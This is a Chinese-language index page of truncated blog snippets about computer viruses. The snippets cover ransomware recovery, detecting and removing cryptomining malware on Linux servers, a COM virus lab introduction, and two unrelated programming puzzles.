    网络技术的不断发展,为企业的生产运营提供了坚实的基础,但随之而来的网络安全威胁也不断增加,影响了企业的正常生产生活。近期,云天数据恢复中心陆续接到很多企业的求助,企业计算机服务器遭到了mkp勒索病毒攻击,导致企业的所有数据被加密无法正常使用。经过云天数据恢复中心对mkp勒索病毒......
  • linux服务器挖矿病毒 xmrig 排查和清除
    本身因为做后端开发没事的时候希望搞点小东西,就买了一个腾讯云的服务器。昨天突然收到腾讯云发的告警信息,提示服务器被人非法登录了。这个ip我也查了下,不确定是不是固定ip。我看到这个第一时间想到的就是被人注入脚本进行挖矿了,(碰到过好多次了............
  • COM病毒实验原理
    0×01实验内容编译生成com病毒,用com病毒对测试文件进行感染。0×02实验目的了解COM病毒的原理,掌握COM病毒的分析及其修改过程。0×03实验原理COM文件是一种单段执行结构的文件,其执行文件代码和执行时内存映像完全相同,起始执行偏移地址为100H,对应于文件的偏移00H(文件头)......
  • 企业服务器中了babyk勒索病毒怎么办,babyk勒索病毒解密数据集恢复
    网络技术的不断发展应用,为企业的生产生活提供了强有力帮助,企业也不断走向数字化办公模式,而对于企业来说,企业计算机存储的数据至关重要,如果不加以保护很容易造成数据丢失,近期,云天数据恢复中心陆续接到很多企业的求助,企业计算机服务器遭到了babyk勒索病毒攻击,导致企业的所有文件被加......
  • Y病毒
    importjava.util.Scanner;publicclassMain{publicstaticvoidmain(String[]args){Scannerin=newScanner(System.in);intn=in.nextInt();intdelay=in.nextInt();intforget=in.nextInt();intarr[]=......
  • 记一次云服务器 CPU 爆满原因—被 kdevtmpfsi 挖矿病毒入侵
    目录1.问题表现2.问题解决1.问题表现突然发现云主机的CPU使用率爆满了,我寻思着我也没干啥啊,不会中病毒了吧看了下docker中的容器,多了很多不知道哪里来的东西把容器和镜像统统删光后,短暂的恢复了一下,但过一阵子,CPU又爆满了用top命令查看了自己服务器CPU运行情况......
  • [LOJ6698] 一键挖矿
    一键挖矿弱化版(?):CF562F将矩阵扩展一个单位(长宽均加1),把当前存在的格子染色。可以发现当且仅当恰好存在4个有1个格子被染色,不存在有3个格子被染色的2x2矩阵时满足题意。枚举右端点r,设g(l)表示选择[l,r]时有多少个上述矩阵。可以发现g(r)=4,且对于x\(\in\)[l,r],......
  • 病毒
              ......
  • Centos感染挖矿病毒kswapd0
    top查看发现kswapd0占用异常高有一个陌生的用户comp先删除authorized_keys中陌生的key查看root的计划任务(发现没异样)crontab-l查看该用户的计划任务sudo-ucompbash-c'crontab-l'发现删除,顺便删除crontab里面使用的文件和文件夹删除comp用户的进程查看......
  • “挖矿”病毒排查处置方法
    排查方法挖矿病毒被植入主机后,利用主机的运算力进行挖矿,主要体现在CPU使用率高达90%以上,有大量对外进行网络连接的日志记录。Linux主机中挖矿病毒后的现象如下图所示:Windows主机中挖矿病毒后的现象如下图所示:处置方法一旦发现主机或服务器存在上述现象,则极有可能已经感染了......